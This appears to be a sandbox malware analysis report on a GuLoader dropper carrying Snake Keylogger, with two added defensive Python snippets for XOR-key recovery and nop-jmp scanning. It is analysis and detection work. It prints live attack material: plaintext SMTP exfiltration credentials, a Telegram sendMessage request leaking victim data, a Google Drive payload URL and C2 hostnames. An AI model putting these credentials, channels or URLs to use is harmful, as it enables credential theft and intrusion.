Windows Analysis Report
GBYfjUz4a5.exe

Overview

General Information

Sample name: GBYfjUz4a5.exe (renamed because the original name is a hash value)
Original sample name: 3c7ce26361ffddf491732e53dbdb1d457dc651e3709a04dc36cfa751f4333f65.exe
Analysis ID: 1632394
MD5: 6f6a2f1350b0512ad0dd3d4a6e060f6c
SHA1: 72287931c88f65da905ba186fd09963c3e773b5c
SHA256: 3c7ce26361ffddf491732e53dbdb1d457dc651e3709a04dc36cfa751f4333f65
Tags: exe, VIPKeylogger, user-adrian__luca

Detection

GuLoader, Snake Keylogger
Score: 100 (range 0 - 100)
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • GBYfjUz4a5.exe (PID: 6292 cmdline: "C:\Users\user\Desktop\GBYfjUz4a5.exe" MD5: 6F6A2F1350B0512AD0DD3D4A6E060F6C)
    • GBYfjUz4a5.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\GBYfjUz4a5.exe" MD5: 6F6A2F1350B0512AD0DD3D4A6E060F6C)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Extracted malware configuration (Snake Keylogger):
{"Exfil Mode": "SMTP", "Username": "manusevialup@sevialup.es", "Password": "Manu2020@", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Both exfiltration channels are visible in this run: the extracted configuration names SMTP (smtp.ionos.es:587), while the captured traffic also contains a Telegram Bot API sendMessage request (see Networking).
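The CloudEyE/GuLoader entry above states that the downloaded payload is XORed but says nothing about how the key is derived. The following is an added example, not code from this report, from Joe Security or from the malware, that assumes the simplest scheme, a repeating multi-byte XOR key, and recovers it by known plaintext: every PE carries the fixed linker DOS stub ("This program cannot be run in DOS mode") at offset 0x40, which yields enough keystream bytes to pin down the key for any period up to the stub length. The sample PE skeleton and the 5-byte key are constructed here. If a real stage uses a different scheme, the consistency check fails and the function returns None rather than a wrong key.

```python
from __future__ import annotations
import struct

# The 14-byte stub code plus message that the Microsoft linker places at offset
# 0x40 of nearly every PE. These fixed bytes are the known plaintext.
DOS_STUB = (b"\x0e\x1f\xba\x0e\x00\xb4\x09\xcd\x21\xb8\x01\x4c\xcd\x21"
            b"This program cannot be run in DOS mode.\r\r\n$")
STUB_OFFSET = 0x40


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key; byte i uses key[i % len(key)]."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(blob: bytes, max_key_len: int = 32) -> bytes | None:
    """Known-plaintext attack on repeating-key XOR.

    ciphertext[0x40:] XOR DOS_STUB gives len(DOS_STUB) consecutive keystream
    bytes. For each candidate period, fold them onto key positions and accept
    the shortest period that is self-consistent and also decodes 'MZ' at 0.
    """
    if len(blob) < STUB_OFFSET + len(DOS_STUB):
        return None
    keystream = bytes(c ^ p for c, p in
                      zip(blob[STUB_OFFSET:STUB_OFFSET + len(DOS_STUB)], DOS_STUB))
    for klen in range(1, max_key_len + 1):
        key = bytearray(klen)
        seen = [False] * klen
        consistent = True
        for j, ks in enumerate(keystream):
            idx = (STUB_OFFSET + j) % klen   # the absolute offset selects the key byte
            if seen[idx] and key[idx] != ks:
                consistent = False
                break
            key[idx], seen[idx] = ks, True
        if consistent and all(seen) and xor_repeating(blob[:2], bytes(key)) == b"MZ":
            return bytes(key)
    return None


def looks_like_pe(data: bytes) -> bool:
    """Cheap sanity check: MZ magic and a PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def decode_payload(blob: bytes) -> bytes:
    """Recover the key, decode, and refuse anything that is not a PE."""
    key = recover_key(blob)
    if key is None:
        raise ValueError("no repeating XOR key is consistent with a PE DOS stub")
    decoded = xor_repeating(blob, key)
    if not looks_like_pe(decoded):
        raise ValueError("decoded data is not a PE image")
    return decoded


def build_fake_pe() -> bytes:
    """Constructed stand-in for a downloaded stage: a minimal MZ/PE skeleton."""
    hdr = bytearray(0x40)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)               # e_lfanew -> 0x80
    image = bytes(hdr) + DOS_STUB
    image += b"\x00" * (0x80 - len(image))
    image += b"PE\x00\x00" + b"\x4c\x01" + b"\x00" * 58   # signature, Machine=i386, filler
    return image


# Constructed inputs: an arbitrary 5-byte key, not one observed in this sample.
SAMPLE_KEY = b"\x37\xa1\x5c\xf0\x12"
ENCRYPTED_STAGE = xor_repeating(build_fake_pe(), SAMPLE_KEY)

if __name__ == "__main__":
    key = recover_key(ENCRYPTED_STAGE)
    print("recovered key:", key.hex() if key else None)
    print("valid PE after decode:", looks_like_pe(decode_payload(ENCRYPTED_STAGE)))
```

Because the search runs from period 1 upward, a key of length 5 is never misreported as a length-10 key, and a blob that is not XORed at all comes back as the single-byte key 0x00. Verifying the PE signature at e_lfanew after decoding guards against a coincidental match on the stub alone.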
Source | Rule | Description | Author | Strings
00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security |
00000000.00000002.1545029670.0000000005E90000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |
Process Memory Space: GBYfjUz4a5.exe PID: 6292 | JoeSecurity_GuLoader_3 | Yara detected GuLoader | Joe Security |
Process Memory Space: GBYfjUz4a5.exe PID: 7312 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: GBYfjUz4a5.exe PID: 7312 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security |
            No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T23:17:55.569283+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49693 | 104.21.96.1 | 443 | TCP
2025-03-07T23:18:04.930033+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49699 | 104.21.96.1 | 443 | TCP
2025-03-07T23:17:50.067835+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49691 | 132.226.247.73 | 80 | TCP
2025-03-07T23:17:53.239861+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49691 | 132.226.247.73 | 80 | TCP
2025-03-07T23:17:56.364709+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49694 | 132.226.247.73 | 80 | TCP
2025-03-07T23:17:59.396009+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49696 | 132.226.247.73 | 80 | TCP
2025-03-07T23:18:02.645980+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49698 | 132.226.247.73 | 80 | TCP
2025-03-07T23:17:39.552256+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49689 | 142.250.184.206 | 443 | TCP
2025-03-07T23:18:20.808335+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49708 | 149.154.167.220 | 443 | TCP


            AV Detection

Source: GBYfjUz4a5.exe | Avira: detected
Source: 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "manusevialup@sevialup.es", "Password": "Manu2020@", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
Source: GBYfjUz4a5.exe | Virustotal: Detection: 67%
Source: GBYfjUz4a5.exe | ReversingLabs: Detection: 50%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA87A8 CryptUnprotectData | 7_2_02DA87A8
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_02DA8EF1 CryptUnprotectData | 7_2_02DA8EF1
Source: GBYfjUz4a5.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49692 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_0040276E FindFirstFileW | 0_2_0040276E
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 0_2_00405770
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 0_2_0040622B FindFirstFileW,FindClose | 0_2_0040622B
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_0040276E FindFirstFileW | 7_2_0040276E
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_00405770 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose | 7_2_00405770
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code function: 7_2_0040622B FindFirstFileW,FindClose | 7_2_0040622B
Source: C:\Users\user\Desktop\GBYfjUz4a5.exe | Code functions containing inlined nop sequences (4x nop followed by a jmp, lea or mov), listed as function id: pattern
7_2_02BDF961: 4x nop then jmp 02BDFC19h
7_2_02BDF2C0: 4x nop then jmp 02BDF45Dh
7_2_02BDF4AC: 4x nop then jmp 02BDF45Dh
7_2_02DA8FB0: 4x nop then jmp 02DA9280h
7_2_02DA7B78: 4x nop then jmp 02DA7EB5h
7_2_02DA4ED0: 4x nop then jmp 02DA5179h
7_2_02DA72C8: 4x nop then jmp 02DA7571h
7_2_02DAAE90: 4x nop then jmp 02DAB15Fh
7_2_02DACE80: 4x nop then jmp 02DAD14Fh
7_2_02DA1EA8: 4x nop then jmp 02DA2151h
7_2_02DA1A50: 4x nop then jmp 02DA1CF9h
7_2_02DA4A78: 4x nop then jmp 02DA4D21h
7_2_02DA6E70: 4x nop then jmp 02DA7119h
7_2_02DAEE70: 4x nop then jmp 02DAF13Fh
7_2_02DA6A18: 4x nop then jmp 02DA6CC1h
7_2_02DAAA00: 4x nop then jmp 02DAACCFh
7_2_02DA4620: 4x nop then jmp 02DA48C9h
7_2_02DA5BD8: 4x nop then jmp 02DA5E81h
7_2_02DA97C0: 4x nop then jmp 02DA9A8Fh
7_2_02DAF790: 4x nop then jmp 02DAFA5Fh
7_2_02DA5780: 4x nop then jmp 02DA5A29h
7_2_02DA2BB0: 4x nop then jmp 02DA2E59h
7_2_02DAB7B0: 4x nop then jmp 02DABA7Fh
7_2_02DAD7A0: 4x nop then jmp 02DADA6Fh
7_2_02DA2758: 4x nop then jmp 02DA2A01h
7_2_02DAD310: 4x nop then jmp 02DAD5DFh
7_2_02DA2300: 4x nop then jmp 02DA25A9h
7_2_02DAF300: 4x nop then jmp 02DAF5CFh
7_2_02DA5328: 4x nop then jmp 02DA55D1h
7_2_02DA7720: 4x nop then jmp 02DA79C9h
7_2_02DAB320: 4x nop then jmp 02DAB5EFh
7_2_02DAC0D0: 4x nop then jmp 02DAC39Fh
7_2_02DAE0C0: 4x nop then jmp 02DAE38Fh
7_2_02DA08F0: 4x nop then jmp 02DA0B99h
7_2_02DAA0E0: 4x nop then jmp 02DAA3AFh
7_2_02DA0498: 4x nop then jmp 02DA0741h
7_2_02DA6488: 4x nop then jmp 02DA6733h
7_2_02DA9C50: 4x nop then jmp 02DA9F1Fh
7_2_02DA0040: 4x nop then jmp 02DA02E9h
7_2_02DABC40: 4x nop then jmp 02DABF0Fh
7_2_02DA3460: 4x nop then jmp 02DA3709h
7_2_02DA3008: 4x nop then jmp 02DA32B1h
7_2_02DA6030: 4x nop then jmp 02DA62D9h
7_2_02DADC30: 4x nop then jmp 02DADEFFh
7_2_02DA15F8: 4x nop then jmp 02DA18A1h
7_2_02DAC9F0: 4x nop then jmp 02DACCBFh
7_2_02DAE9E0: 4x nop then jmp 02DAECAFh
7_2_02DA11A0: 4x nop then jmp 02DA1449h
7_2_02DAE550: 4x nop then jmp 02DAE81Fh
7_2_02DA0D48: 4x nop then jmp 02DA0FF1h
7_2_02DAA570: 4x nop then jmp 02DAA83Fh
7_2_02DAC560: 4x nop then jmp 02DAC82Fh
7_2_02E18E88: 4x nop then jmp 02E19180h
7_2_02E14B98: 4x nop then jmp 02E14E90h
7_2_02E14478: 4x nop then jmp 02E147E8h
7_2_02E16848: 4x nop then jmp 02E16B40h
7_2_02E19CE0: 4x nop then jmp 02E19FD8h
7_2_02E13FE8: 4x nop then jmp 02E142B7h
7_2_02E1C7E8: 4x nop then jmp 02E1CAE0h
7_2_02E159F0: 4x nop then jmp 02E15CE8h
7_2_02E1F2F0: 4x nop then jmp 02E1F5E8h
7_2_02E11FF8: 4x nop then jmp 02E122C7h
7_2_02E184F8: 4x nop then jmp 02E187F0h
7_2_02E189C0: 4x nop then jmp 02E18CB8h
7_2_02E136C8: 4x nop then jmp 02E13997h
7_2_02E1B4C8: 4x nop then jmp 02E1B7C0h
7_2_02E1DFD0: 4x nop then jmp 02E1E2C8h
7_2_02E116D8: 4x nop then jmp 02E119A7h
7_2_02E171D8: 4x nop then jmp 02E174D0h
7_2_02E176A0: 4x nop then jmp 02E17998h
7_2_02E12DA8: 4x nop then jmp 02E13078h
7_2_02E1A1A8: 4x nop then jmp 02E1A4A0h
7_2_02E1CCB0: 4x nop then jmp 02E1CFA8h
7_2_02E10DB8: 4x nop then jmp 02E11087h
7_2_02E15EB8: 4x nop then jmp 02E161B0h
7_2_02E1F7B8: 4x nop then jmp 02E1FAB0h
7_2_02E16380: 4x nop then jmp 02E16678h
7_2_02E12488: 4x nop then jmp 02E12757h
7_2_02E1B990: 4x nop then jmp 02E1BC88h
7_2_02E10498: 4x nop then jmp 02E10767h
7_2_02E1E498: 4x nop then jmp 02E1E790h
7_2_02E15060: 4x nop then jmp 02E15358h
7_2_02E1E960: 4x nop then jmp 02E1EC59h
7_2_02E11B68: 4x nop then jmp 02E11E37h
7_2_02E17B68: 4x nop then jmp 02E17E60h
7_2_02E1A670: 4x nop then jmp 02E1A968h
7_2_02E1D178: 4x nop then jmp 02E1D470h
7_2_02E10040: 4x nop then jmp 02E102E7h
7_2_02E1D640: 4x nop then jmp 02E1D938h
7_2_02E11248: 4x nop then jmp 02E11517h
7_2_02E19350: 4x nop then jmp 02E19648h
7_2_02E13B58: 4x nop then jmp 02E13E27h
7_2_02E1BE58: 4x nop then jmp 02E1C150h
7_2_02E1C320: 4x nop then jmp 02E1C618h
7_2_02E10928: 4x nop then jmp 02E10BF7h
7_2_02E15528: 4x nop then jmp 02E15820h
7_2_02E1EE28: 4x nop then jmp 02E1F120h
7_2_02E18030: 4x nop then jmp 02E18328h
7_2_02E13238: 4x nop then jmp 02E13507h
7_2_02E1AB38: 4x nop then jmp 02E1AE30h
7_2_02E1B000: 4x nop then jmp 02E1B2F8h
7_2_02E1DB08: 4x nop then jmp 02E1DE00h
7_2_02E16D10: 4x nop then jmp 02E17008h
7_2_02E12918: 4x nop then jmp 02E12BE7h
7_2_02E19818: 4x nop then jmp 02E19B10h
7_2_02E3F228: 4x nop then lea esp, dword ptr [ebp-04h]
7_2_02E3F21E: 4x nop then lea esp, dword ptr [ebp-04h]
7_2_02E3F53E: 4x nop then lea esp, dword ptr [ebp-04h]
7_2_02E40508: 4x nop then jmp 02E40800h
7_2_02E40040: 4x nop then jmp 02E40338h
7_2_02E72A80: 4x nop then lea esp, dword ptr [ebp-04h]
7_2_02E72A70: 4x nop then lea esp, dword ptr [ebp-04h]
7_2_35CD2EF0: 4x nop then jmp 35CD3308h
7_2_35CD2A90: 4x nop then jmp 35CD2D41h
7_2_35CDCDC0: 4x nop then jmp 35CDD069h
7_2_35CDF930: 4x nop then jmp 35CDFBD9h
7_2_35CDF4D8: 4x nop then jmp 35CDF781h
7_2_35CDF080: 4x nop then jmp 35CDF329h
7_2_35CD0040: 4x nop then mov dword ptr [ebp-14h], 00000000h
7_2_35CD0853: 4x nop then mov dword ptr [ebp-14h], 00000000h
7_2_35CDEC28: 4x nop then jmp 35CDEED1h
7_2_35CDE7D0: 4x nop then jmp 35CDEA79h
7_2_35CDE378: 4x nop then jmp 35CDE621h
7_2_35CDDF20: 4x nop then jmp 35CDE1C9h
7_2_35CD0B30: 4x nop then jmp 35CD0D0Dh
7_2_35CD0B30: 4x nop then jmp 35CD16F8h
7_2_35CDDAC8: 4x nop then jmp 35CDDD71h
7_2_35CD2EEA: 4x nop then jmp 35CD3308h
7_2_35CDD670: 4x nop then jmp 35CDD919h
7_2_35CD0673: 4x nop then mov dword ptr [ebp-14h], 00000000h
7_2_35CDD218: 4x nop then jmp 35CDD4C1h
7_2_35CD3236: 4x nop then jmp 35CD3308h
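The rows above list, one function at a time, the "4x nop then jmp" pattern that the sandbox reports as inlined nop instructions. As an added example that is not part of the report, the scanner below finds that byte-level pattern in raw code: a run of at least four 0x90 bytes immediately followed by a short (EB rel8) or near (E9 rel32) jmp, with the jump target resolved so hits can be printed in the report's "jmp <target>h" form. The code buffer and the image base are constructed for the example. It recognises only the jmp form (not the lea/mov variants also listed), and pure byte matching will fire on data that happens to look like code, so hits are triage leads to confirm in a disassembler, not proof of obfuscation.

```python
from __future__ import annotations

NOP = 0x90
JMP_REL8, JMP_REL32 = 0xEB, 0xE9


def find_nop_jmp(code: bytes, base: int = 0, min_nops: int = 4) -> list[dict]:
    """Return every run of >= min_nops NOPs that is directly followed by a jmp.

    Each hit records the VA of the first nop, the run length, the jmp form and
    the resolved target (rel is taken from the end of the jmp instruction).
    """
    hits: list[dict] = []
    i, n = 0, len(code)
    while i < n:
        if code[i] != NOP:
            i += 1
            continue
        start = i
        while i < n and code[i] == NOP:
            i += 1
        run = i - start
        if run < min_nops or i >= n:
            continue                      # too short, or the nops run to end of buffer
        op = code[i]
        if op == JMP_REL32 and i + 5 <= n:
            rel = int.from_bytes(code[i + 1:i + 5], "little", signed=True)
            hits.append({"va": base + start, "nops": run, "form": "jmp rel32",
                         "target": base + i + 5 + rel})
        elif op == JMP_REL8 and i + 2 <= n:
            rel = int.from_bytes(code[i + 1:i + 2], "little", signed=True)
            hits.append({"va": base + start, "nops": run, "form": "jmp rel8",
                         "target": base + i + 2 + rel})
    return hits


def format_hit(hit: dict) -> str:
    """Render a hit the way the sandbox rows read: '<n>x nop then jmp <target>h'."""
    return f"{hit['nops']}x nop then jmp {hit['target']:08X}h at {hit['va']:08X}"


# Constructed code buffer (not bytes taken from the sample); the base is assumed
# so that the output resembles the report's addresses.
SAMPLE_BASE = 0x02DA0000
SAMPLE_CODE = bytes.fromhex(
    "55 8b ec "              # push ebp; mov ebp, esp
    "90 90 90 90 "           # four nops           -> should match
    "e9 10 00 00 00 "        # jmp +0x10 (rel32)
    "90 90 "                 # only two nops       -> must not match
    "eb 02 "                 # jmp rel8 without a nop sled
    "90 90 90 90 90 "        # five nops           -> should match
    "eb 05 "                 # jmp +5 (rel8)
    "c3"                     # ret
)

if __name__ == "__main__":
    for h in find_nop_jmp(SAMPLE_CODE, SAMPLE_BASE):
        print(format_hit(h))
```

Run it over a dumped code section (for example the 7_2_02DA0000 region from this report) with the section's VA as base; every hit should then be confirmed by disassembling at the reported VA, since a false hit on packed data is cheap to rule out by eye.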

            Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49708 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected (9 requests, 7 with "Connection: Keep-Alive", 2 without): GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20and%20Time:%2008/03/2025%20/%2022:26:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20648351%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
  (URL-decoded text parameter: "PC Name:648351 / Date and Time: 08/03/2025 / 22:26:43 / Country Name: United States / [ 648351 Clicked on the File If you see nothing this's mean the system storage's empty. ]"; the bot token after /bot and the chat_id value are empty in the captured request, and no User-Agent header is sent)
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.96.1
Source: Joe Sandbox View | IP Address: 132.226.247.73
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49698 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49694 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49696 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49691 -> 132.226.247.73:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49693 -> 104.21.96.1:443
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49689 -> 142.250.184.206:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49699 -> 104.21.96.1:443
Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Host: drive.google.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /download?id=1OeLfKimg0kAhmFZKIeP6XjCcrORJLZ2v&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 | Cache-Control: no-cache | Host: drive.usercontent.google.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected (10 requests, 5 with "Connection: Keep-Alive", 5 without): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.6:49692 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:18:20 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
            Source: GBYfjUz4a5.exe, 00000007.00000002.2507440428.0000000035D52000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000003.2268525470.0000000035D5D000.00000004.00000020.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
            Source: GBYfjUz4a5.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033361000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2505203474.0000000033444000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:648351%0D%0ADate%20a
            Source: GBYfjUz4a5.exe, 00000007.00000003.1705150186.0000000002FE3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: GBYfjUz4a5.exe, 00000007.00000002.2506408068.0000000034676000.00000004.00000800.00020000.00000000.sdmp, GBYfjUz4a5.exe, 00000007.00000002.2506408068.000000003463C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
